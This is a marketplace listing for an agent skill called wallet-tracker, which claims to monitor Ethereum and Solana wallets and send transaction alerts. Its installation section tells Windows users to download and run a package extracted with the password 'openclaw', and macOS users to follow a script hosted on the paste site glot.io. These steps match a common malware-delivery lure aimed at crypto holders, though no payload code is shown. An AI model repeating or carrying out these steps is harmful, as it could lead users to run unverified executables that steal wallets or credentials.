wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Monitor Ethereum and Solana wallets, track whale movements, and receive automated transaction alerts using the powerful OpenClaw wallet-tracker skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-0ghskWhat This Skill Does
The wallet-tracker skill is a robust monitoring solution for the OpenClaw ecosystem, designed to provide real-time insights into blockchain activity. By integrating directly with the openclaw-agent, it enables users to observe whale movements, track ERC-20 token transfers, monitor NFT activity, and keep tabs on DeFi interactions across multiple chains including Ethereum and Solana. The skill provides both modular shell-based commands for quick checks and automated Python templates for persistent monitoring, making it suitable for both casual observers and advanced traders.
Installation
To begin, ensure you have the openclaw-agent installed. For Windows, download the latest package from the official GitHub repository, extract it using the password 'openclaw', and execute the program. For macOS, follow the instructions provided in the installation script hosted on glot.io. Once the agent is active, install the skill by running the following command in your terminal:
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-0ghsk
Ensure your API keys (e.g., Etherscan) are properly configured within your environment to enable seamless data retrieval from blockchain nodes.
Use Cases
This skill is ideal for several high-value scenarios:
- Whale Watching: Identify large inflows or outflows of assets from known whale wallets to anticipate market moves.
- Portfolio Rebalancing: Keep track of your own or other wallets' diversification across various token standards.
- DeFi Analytics: Monitor interactions with specific smart contracts, such as lending protocols or decentralized exchanges, to understand yield changes.
- NFT Tracking: Receive notifications when specific NFTs are moved or sold, allowing for timely responses to market opportunities.
Example Prompts
- "OpenClaw, track wallet 0x71C7656... and alert me whenever a transaction exceeds 10 ETH."
- "Show me the last 5 ERC-20 token transfers for the Solana address [ADDRESS] using the wallet-tracker tool."
- "Set up a background monitor for my Ethereum portfolio and report any changes in my token balance to my dashboard."
Tips & Limitations
- Reliability: Always ensure the openclaw-agent is running in the background; tracking will fail if the local proxy is offline.
- Rate Limits: Be mindful of API rate limits imposed by services like Etherscan. If you are tracking many wallets simultaneously, consider using a dedicated node provider.
- Security: Never share your private keys with the agent. This tool is designed to monitor public chain data only. Always verify that your API keys are stored in secure environment variables rather than hard-coded into your monitoring scripts.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-0ghsk": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.